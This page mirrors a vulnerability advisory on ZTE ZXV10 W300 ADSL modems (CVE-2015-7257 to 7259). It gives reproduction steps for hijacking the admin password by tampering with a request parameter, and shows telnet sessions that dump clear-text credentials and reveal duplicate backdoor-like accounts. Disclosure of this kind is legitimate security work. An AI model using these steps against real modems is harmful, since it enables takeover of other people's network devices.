扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 |
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities] # Discovered by: Karn Ganeshen # Vendor Homepage: [www.zte.com.cn] # Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57] *CVE-ID*: CVE-2015-7257 CVE-2015-7258 CVE-2015-7259 *Note*: Large deployment size, primarily in Peru, used by TdP. 1 *Insufficient authorization controls* *CVE-ID*: CVE-2015-7257 Observed in Password Change functionality. Other functions may be vulnerable as well. *Expected behavior:* Only administrative 'admin' user should be able to change password for all the device users. 'support' is a diagnostic user with restricted privileges. It can change only its own password. *Vulnerability:* Any non-admin user can change 'admin' password. *Steps to reproduce:* a. Login as user 'support' password XXX b. Access Password Change page - http://<IP>/password.htm c. Submit request d. Intercept and Tamper the parameter username change from 'support' to 'admin' e. Enter the new password > old password is not requested > Submit > Login as admin -> Pwn! 2 *Sensitive information disclosure - clear-text passwords* *CVE-ID*: CVE-2015-7258 Displaying user information over Telnet connection, shows all valid users and their passwords in clear-text. *Steps to reproduce:* $ telnet <IP> Trying <IP>... Connected to <IP>. Escape character is '^]'. User Access Verification Username: admin Password: < admin/XXX1 $sh ADSL#login show <-- shows user information Username Password Priority adminpassword1 2 supportpassword2 0 admin password3 1 3 *(Potential) Backdoor account feature - **insecure account management* *CVE-ID*: CVE-2015-7259 Same login account can exist on the device, multiple times, each with different priority#. It is possible to log in to device with either of the username/password combination. It is considered as a (redundant) login support *feature*. *Steps to reproduce:* $ telnet <IP> Trying <IP>... Connected to <IP>. Escape character is '^]'. User Access Verification User Access Verification Username: admin Password: <-- admin/password3 $sh ADSL#login show UsernamePasswordPriority adminpassword12 supportpassword20 adminpassword31 +++++ -- Best Regards, Karn Ganeshen |
体验盒子
